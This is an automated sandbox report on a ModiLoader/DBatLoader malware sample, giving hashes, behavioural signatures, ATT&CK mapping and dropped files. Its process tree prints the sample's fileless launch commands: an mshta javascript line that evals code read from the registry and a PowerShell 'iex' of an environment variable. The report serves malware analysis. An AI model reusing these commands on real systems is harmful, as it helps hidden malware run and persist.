Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
12-05-2024 03:48
General
-
Target
381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe
-
Size
396KB
-
MD5
381a181f8e40fc7ddf8c2c15dc6d55a2
-
SHA1
f68755990d7dc1b8d346080b62dda8a8b0369cba
-
SHA256
9f195d5b1ff0a5f0c07973d60624c89141c01c0d01d3f8091aa7626150ddf598
-
SHA512
18823d064ed0ef65921a7fe9d7cf5efb46672c0e71128a7ff6dace37d4575fa8a8d15068aa6180ba607d0458aeb68a903b849c90c8e296a7acadb4eb05de3482
-
SSDEEP
12288:qr+gCgRhGHQLJdTdQmX7PT8Iq2JrE2s0vbvd:qrBPYkE2sa1
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 60 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\381a181f8e40fc7ddf8c2c15dc6d55a2_JaffaCakes118.exe"2⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:dVKZr0k2E="sVGl";y0q=new%20ActiveXObject("WScript.Shell");YieNdu7h1="40XN7UN";gLy9c=y0q.RegRead("HKLM\\software\\Wow6432Node\\EdZqpSCFu\\dKuBjAbfBj");joU0oYAg="8X";eval(gLy9c);MaB4mTb0="uv8K";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ulxzjnrb2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33dFilesize
49KB
MD577c2492426f7f3192b2449b9d957f7e0
SHA157a97e1b99138dabf3904300847a11c92b8d1e29
SHA25640509f91fb9d9005e4ffd8fdd4c8687f4297732d571cae1d8c6cc317d5148fab
SHA512c10b474bb1982726f57fb09a056bf672545150f392639612f4ae64f3f2a671db3fa9d03b633c2c7c4733c63b7e37d33a2e2623cb42213244c82b02e741be4e52
-
C:\Users\Admin\AppData\Local\416844\7efaba.batFilesize
61B
MD5a9d3ea542d72c3d4eb6e79b37f9b265e
SHA19ef048c6a4cc72891fe4b6d8c3ae59e134711cb9
SHA256d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314
SHA512eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b
-
C:\Users\Admin\AppData\Local\416844\eecdc5.lnkFilesize
881B
MD55cc60b2736588543220c1b8b74c69403
SHA114090447533e6548a435e2029d156ffc2f53775f
SHA256270cab4af8d26d3f8e8bed3dee574866b0bb23097dc603ac280577ca18e38864
SHA512c09f4d78caeb6e0f0712800bb085597401b207b862dbe545edde8d35c2b4c4ef501153a2dd28a1809c317acb0eb35202ef4f3fc6e4ee15e306200e2d78cb5a25
-
C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33dFilesize
24KB
MD5e1ccc1a00a7149633f9a87b271874601
SHA1119492bb6bd6c1a65fe7b6c7b8ab316c5036d16d
SHA2566d7d2d22cf76e8e1b13f9fd0631b62dc91ed3402b15d124b4d903de4c693382d
SHA512b42a07b0764d657d1fe01c5183102282751be845b01a695ccb901a7e0a03c45283bd56431e16a7290c5b2daf55dcdba321875aee47be81df5a6e16303d7ae72b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnkFilesize
991B
MD593810f212c8f6bc7e59fb1b2364863e3
SHA1f32804e2d0d31bbe9792e7382eae7717e6790e9e
SHA25616153bef5688fae06c921896e7b47cd246080617ca5233ccff99c852c79aaad9
SHA51295d32ac55bd457b01ade16cd9abfaaa0fe421037018ebbdd2a35d6b851640a30731f88aadd3fbe5a364784b3589bc093ef6a97b60464f44f662f19da65370ad5
-
memory/1464-16-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-12-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-15-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-14-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-13-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-17-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-18-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/1464-11-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1464-10-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1464-4-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1484-55-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-44-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-37-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-40-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-46-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-33-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-50-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-36-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-62-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-41-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-45-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-72-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-65-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-64-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-63-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-61-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-56-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-35-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-54-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-53-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-52-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-51-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-49-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-48-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-47-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-38-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-43-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-42-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-39-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-29-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-31-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1484-34-0x0000000000270000-0x00000000003B1000-memory.dmpFilesize
1.3MB
-
memory/1656-91-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-89-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-88-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-85-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-86-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-84-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-82-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-81-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-92-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-90-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-87-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-93-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-79-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-78-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-83-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/1656-80-0x0000000000150000-0x0000000000291000-memory.dmpFilesize
1.3MB
-
memory/2652-27-0x00000000061A0000-0x0000000006276000-memory.dmpFilesize
856KB
-
memory/2652-32-0x00000000061A0000-0x0000000006276000-memory.dmpFilesize
856KB